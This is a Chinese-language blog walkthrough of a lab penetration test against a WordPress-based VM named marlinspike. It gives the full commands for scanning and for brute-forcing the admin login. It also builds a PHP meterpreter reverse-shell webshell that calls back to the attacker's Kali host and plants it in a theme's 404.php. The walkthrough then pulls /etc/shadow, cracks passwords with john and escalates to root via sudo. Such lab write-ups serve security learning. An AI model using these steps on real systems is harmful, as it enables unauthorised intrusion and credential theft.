综合实战第一章-暴力破解实战


综合实战第一章

暴力破解实战

环境准备

攻击机:kali 192.168.3.134

靶机:marlinspike 192.168.3.157

信息搜集

老规矩

nmap -sT 192.168.3.0/24

image-20220424211935950

nmap -p- -A 192.168.3.157

image-20220424212102509

咱们看看80端口

image-20220424212209073

啥也没有,啥也不是

用nikto扫描一下

nikto -h http://192.168.3.157

image-20220424212453005

ok在浏览器里看一看

image-20220424212609235

一看,是wordpress 做的,有搞头了

wordpress默认后台登录地址是/wp-login.php

image-20220425080347793

尝试暴力破解

在命令行界面

msfconsole
use auxiliary/scanner/http/wordpress_login_enum
set username admin //wordpress默认用户是admin

还需要加一个字典

set pass_file usr/share/wordlists/dirb/common.txt
set fargeturi http://192.168.3.157/
set rhost 192.168.3.157
run

image-20220425082015316

不好使,还是用burpsuite吧

暴力破解出密码也是admin,登录网站

上传webshell

然后就是在404里面写入木马了

构造webshell

msfvenom -p php/meterpreter/reverse_tcp lhost= 192.168.3.134 lport=4444 -f raw > /root/msfshell.php

打开msf

msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.3.134
set lport 4444

把构造好的木马复制粘贴进文件里面

image-20220425104228021

上传上去之后执行404.php

/wp-content/themes/twentyseventeen/404.php

image-20220425105039512

连上了

可以下载文件

download /etc/passwd
download /etc/shadow

看一眼奥

image-20220425105336437

把shadow和passwd这俩文件合并起来

unshadow passwd shadow > crack

然后就可以用john破解密码了

john crack

image-20220425105726726

提权

剩下的就是快乐的提权了

shell
python -c 'import pty;pty.spawn("/bin/bash")'

先登录用户

su - marlinspike

image-20220425110053867

查看一下权限

sudo -l

image-20220425110146730

三个ALL,可以直接提权到root

sudo su

image-20220425110701441

成了,结束!


文章作者: Broken-year
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Broken-year !
  目录